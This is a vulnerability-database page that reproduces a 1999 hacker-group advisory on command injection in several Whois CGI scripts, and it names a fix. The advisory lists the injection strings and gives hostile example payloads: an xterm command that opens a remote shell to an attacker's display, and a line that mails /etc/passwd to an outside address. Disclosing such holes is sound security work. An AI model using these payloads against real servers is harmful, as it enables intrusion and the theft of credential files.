Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

hhp-whois_adv0013.txt

🗓️ 14 Dec 1999 00:00:00Reported by LoopholeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Critical flaw in Whois CGI packages, allowing command execution due to parsing weaknesses.

Code
` (hhp) Whois.CGI - ADVISORY. (hhp)  
hhp-ADV#12  
11/9/99 8:42:57pm CST  
By: loophole  
[email protected] - http://hhp.perlx.com  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
What?:  
Hole in several known/unknown Whois CGI  
packages.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Versions?:  
1.) Whois Internic Lookup - version: 1.0  
2.) CC Whois - Version: 1.0  
3.) Matt's Whois - Version: 1  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Exploit!:  
These versions allow execution of commands  
due to lack of shell escape character  
parsing if the domain entries consist of  
one of the following strings...  
Note: (Strings will vary for different  
vulnerable versions.)  
  
1.) ;commands  
2.) ";commands  
3.) ;commands;  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Example!:  
If the domain entries consist of:  
1.) ;id  
2.) ";id  
or either,  
3.) ;id;  
you will see something like this:  
'Whois Server Version 1.1  
  
Domain names in the .com, .net, and .org  
domains can now be registered with many  
different competing registrars. Go to  
http://www.internic.net for detailed  
information. etc. etc. etc....  
(scroll to the bottom of the output.)  
uid=501(blah) gid=500(blah)'  
^^^^^\  
` 'id' was executed on the server.  
  
Other example commands can be ran also...  
;xterm -display ip:0.0 -rv -e /bin/sh  
";uname -a;whoami;w;ls -al  
;cat /etc/passwd|mail [email protected];  
Etc, Etc.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Foo!:  
Alot of main *NIC* servers were found  
running vulnerable versions. I am in the  
process of contacting the main servers,  
and the software programmers to advise the  
vulnerability.  
  
Very well known/used sites are  
vulnerable (Which will rename nameless for  
security reasons). I tried to get in  
contact with them, but being such a big  
company/service, I failed, so sad indeed.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Fix?:  
If you run one of these bad scripts,  
delete it and point your browser to:  
http://cgi.resourceindex.com/Programs_and_  
Scripts/Perl/Internet_Utilities/Whois/  
and download one of the secure packages.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Shouts to all of hhp.  
Fuck you to gH for trying to rip this ADV  
before I could release it.  
---hhp-2t0--------------------------------  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
whois cgi vulnerabilitycommand executionparsing weaknessessoftware versionssecurity advisory.
21